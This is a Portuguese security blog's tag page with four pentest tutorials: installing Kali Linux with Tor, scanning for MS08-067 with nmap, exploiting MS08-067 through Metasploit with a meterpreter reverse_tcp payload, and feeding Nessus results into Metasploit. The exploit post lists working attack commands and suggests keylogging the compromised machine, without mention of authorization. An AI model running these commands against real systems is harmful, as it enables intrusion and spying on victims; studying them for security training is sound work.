Anúncios

Arquivo

Posts Tagged ‘metasploit’

Tutorial: Instalando e fazendo as configurações iniciais do Kali Linux no Virtual Box


NOVOS TUTORIAIS AGORA EM http://www.infrasecurity.com.br/blog/?tag=kali-linux

 

Olá a todos

Gostaria de mostrar pra vocês como instalar e configurar o Kali Linux no Virtual Box bem como fazer as configurações iniciais que na minha opinião são indispensáveis.

O Kali Linux é uma evolução do Backtrack e pode ser baixado aqui http://www.kali.org, ele é mantido pela mesma empresa de segurança do Backtrack.

Algumas vantagens que vi no Kali é que ele é baseado em Debian e muitas ferramentas que davam algum problema no Backtrack, aqui até o momento funcionam sem problemas.

Vou mostrar como criar a máquina virtual, instalar o Kali, instalar o VBOX additions, TOR e também o EtherAPE que tinha no backtrack e não por padrão no Kali. Vamos lá?

1 – Criar a máquina virtual:

Vamos criar uma nova e atribuir um nome

ScreenHunter_07 Apr. 03 16.09

Aqui vamos atribuir a quantidade de memória RAM, no caso coloquei 1GB

ScreenHunter_08 Apr. 03 16.09

Vá avançando nas opções padrão até chegar no tamanho do disco, no caso, coloquei 50GB

ScreenHunter_11 Apr. 03 16.10

Antes de inicializar a máquina vá em configurações da VM e mude a placa de rede para Bridged Adapter, isso para que a VM possa acesar o próprio hardware da máquina física.

ScreenHunter_11 Apr. 03 16.11

Nesta opção selecione o CD-ROM e escolha o arquivo ISO do Kali Linux que foi baixado do site

ScreenHunter_12 Apr. 03 16.11

2 – Instalar o Kali Linux

Tudo feito corretamente, bastar iniciar a VM e a tela inicial será essa onde podemos escolher a opção “Graphical Install”

ScreenHunter_12 Apr. 03 16.12

Nesta tela e nas seguintes será possível configurar o idioma, teclado e fuso horário, faça as configurações conforme achar melhorScreenHunter_13 Apr. 03 16.12

Aqui podemos definir um hostname que desejarmos, e na próxima tela, pode ser colocado um sufixo, caso vc tenha um, ou pode deixar em branco mesmo

ScreenHunter_14 Apr. 03 16.14

Defina a senha do usuário Root

ScreenHunter_15 Apr. 03 16.15

Avançando até essa tela podemos usar a primeira opção para o particionamento do disco, a próxima tela é só avançar

ScreenHunter_16 Apr. 03 16.16

Nessa tela, podemos selecionar a primeira opção e avançar

ScreenHunter_18 Apr. 03 16.16

Podemos avançar, e na próxima tela selecionar “YES”

ScreenHunter_18 Apr. 03 16.17

Aguarde a instalação, e nessa, parte se você sua rede já configurada para fornecer um IP e com acesso a internet, vc pode selecionar a opção “Yes”.

ScreenHunter_19 Apr. 03 16.36

Caso tenha um proxy você pode configurar aqui ou simplesmente deixar em branco e avançar

ScreenHunter_20 Apr. 03 16.36

Selecione “Yes” e aguarde a conclusão da Instalação, Ao reiniciar é logar com usuário Root e a senha que vc configurou.

ScreenHunter_20 Apr. 03 16.44

3 – Configurações iniciais.

O primeiro passo é instalar o VBOX  Additions para isso faça o seguinte abra um terminal e digite:

apt-get update && apt-get install -y linux-headers-$(uname -r)

Aguarde a conclusão da instalação

Feito isso vá no Menu “Devices” do Virtual Box e clique em “Install Guest Additions”

ScreenHunter_20 Apr. 03 16.57

Quando for exibido essa tela, clique em cancelar

ScreenHunter_20 Apr. 03 17.00

Execute agora os seguintes comandos no terminal.

cp /media/cdrom0/VBoxLinuxAdditions.run /root/

chmod 755 /root/VBoxLinuxAdditions.run

./VBoxLinuxAdditions.run

Aguarde a conclusão da instalação e reinicie a VM

Após reiniciar, outra coisa que podemos configurar é o metasploit framework para isso faça o seguinte, abra um terminal e digite:

service postgresql start && service metasploit start

aguarde a conclusão e depois digite:

update-rc.d postgresql enable && update-rc.d metasploit enable

Para iniciar basta acessar conforme a imagem

metasploit-kali-metasploit-framework

Outra configuração inicial interessante de se fazer é a configuração do TOR para navegação anônima para isso vamos fazer o seguinte:

apt-get install tor tor-geoipdb polipo vidalia

Feito isso digite

mkdir /var/run/tor

chmod 700 /var/run/tor/

Vamos configurar o polipo para acessar através do tor para isso digite

vim /etc/polipo/config

Descomente as linhas

allowedClientes 127.0.0.1

socksParentProxy = “localhost:9050”

socksParentType = socks5

salve e saia do arquivo e digite

service tor restart

service polipo restart

Daí para navegar anônimo basta configurar no navegador o proxy http para 127.0.0.1 porta 8123 ou proxy socs5 para 127.0.0.1 porta 9050

Também pode ser usado para configurar em outras aplicações que suportem acesso via proxy

Para instalar o EtherApe basta digitar

apt-get install etherape

Aguarde a conclusão e ele vai estar disponível em Applications/Internet.

Espero que tenham gostado dessa dica e por gentileza não deixem de compartilhar

Até a próxima

Anúncios

Tutorial: Usando o nmap para verificação de vulnerabilidades


Olá a todos mais uma vez

Desta vez gostaria de mostrar pra vocês como usar o nmap para checar a existência da vulnerabilidade MS08-067, para quem não conhece essa vulnerabilidade pode ser explorada pelo Worm Conficker. Algumas ferramentas como Metasploit também podem ser usadas para explorar essa vulnerabilidade, basta usar o seguinte comando:

nmap --script smb-check-vulns.nse -p445 <host> (No de um host alvo apenas)

"nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args
safe=1 [target networks] (No caso de escanear todo um segmento de rede)"

A resposta será algo parecido com isso informando se o alvo é vulnerável ou não

Host script results:
| smb-check-vulns:  
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|   regsvc DoS: regsvc DoS: NOT VULNERABLE
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)

Caso vc encontre uma máquina vulnerável vc pode explorer essa falha usando essa dica aqui

http://hernaneac.net/2012/11/28/explorando-vulnerabilidades-usando-metasploit-framework/ 


								

Explorando vulnerabilidades usando Metasploit Framework


Olá, na sequência de nosso último post gostaria de mostrar aqui a forma básica de se explorar uma vulnerabilidade, suponhamos o que sistema alvo tenha a vulnerabilidade MS 08-067 podemos usar localizar um exploit para ela usando o comando search exploits 08-067

Localizado o exploit vamos usá-lo para isso digite

use exploit/windows/smb/ms08_067_netapi

Depois show payloads para ver quais estão disponíveis daí faça a sequência de comandos

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST [IP do BACKTRACK]

set RHOST [IP DO ALVO]

exploit

Feito isso agora é só explorar as possibilidades de exploração como screenshots, keyloggers e muitas outras opções no sistema comprometido.

Gostou? Compartilhe por favor.

Se sua empresa precisa de Suporte Técnico e Consultoria acesse: www.infrasecurity.com.br

 

Usando Nessus e Metasploit juntos


Olá a todos

Nessa dica gostaria de mostrar como usar o nessus juntamente com o Metasploit, fazer isso auxilia muito na hora de encontrar e explorar vulnerabilidades nos sistemas alvo.

Para usar você precisa ter o Nessus instalado e configurado para uso seja no backtrack ou em outra máquina.

Vai precisar também do Metaspoit Framework do Backtrack 5 R3

Abra o Metasploit e na console digite load nessus para carregar o plugin do nessus.

Para conectar à sua instalação do nessus digite nessus_connect msf:msf@127.0.0.1:8843 ok

Mude o local onde está msf:msf pelo seu login e senha de acesso ao sistema Nessus e se necessário caso o Nessus esteja em outra máquina que não seja o Backtrack mude 127.0.0.1 para o IP do computador que tem o Nessus instalado.

Digite nessus_policy_list para ver quais as polices disponíveis para fazer o scan. Numa instalação padrão vai aparecer 4 opções

1- Internal Network Scan

2- External Network Scan

3- Web App Tests

4- Prepare for PCI-DSS audits

Com essa informação em mãos vamos criar um novo scan para isso digite nessus_scan_new 1 WindowsXP 192.168.2.93

No comando acima substitua pelo número ID da police que deseja usar, para teste numa rede local pode usar 1 mesmo. Onde está escrito WindowsXP você pode colocar o nome que desejar para identificar a rotina e evidentemente você deve substituir o IP pelo do seu sistema alvo.

Digite nessus_scan_status para acompanhar o progresso até a conclusão quando acabar digite nessus_report_list e você vai poder visualizar o id e nome do Scan que acabou de ser realizado para analisar as vulnerabilidades encontradas digite nessus_report_vulns 9cc2ded8-150c-75cc-702c-92642f4cb626bbcaecbd84f094bc

Substitua 9cc2ded8-150c-75cc-702c-92642f4cb626bbcaecbd84f094bc pelo ID que vai ser exibido pra você quando executar o nessus_report_list

Para importar esse relatório para o Metasploit digite nessus_report_get 9cc2ded8-150c-75cc-702c-92642f4cb626bbcaecbd84f094bc

Agora digite vulns e visualizará as vulnerabilidades encontradas.

Suponhamos, como exemplo, que tenha encontrado a Vulnerabilidade MS12-020 para localizar um exploit para ela digite search exploits 12-020

Daí é só ir explorando! No próximo post darei um exemplo de como explorar uma dessas vulnerabilidades.

Espero que tenham gostado e até a próxima.

Caso precise de Suporte e Consultoria acesse www.infrasecurity.com.br

Se gostou compartilhe!

Abraço

%d blogueiros gostam disto: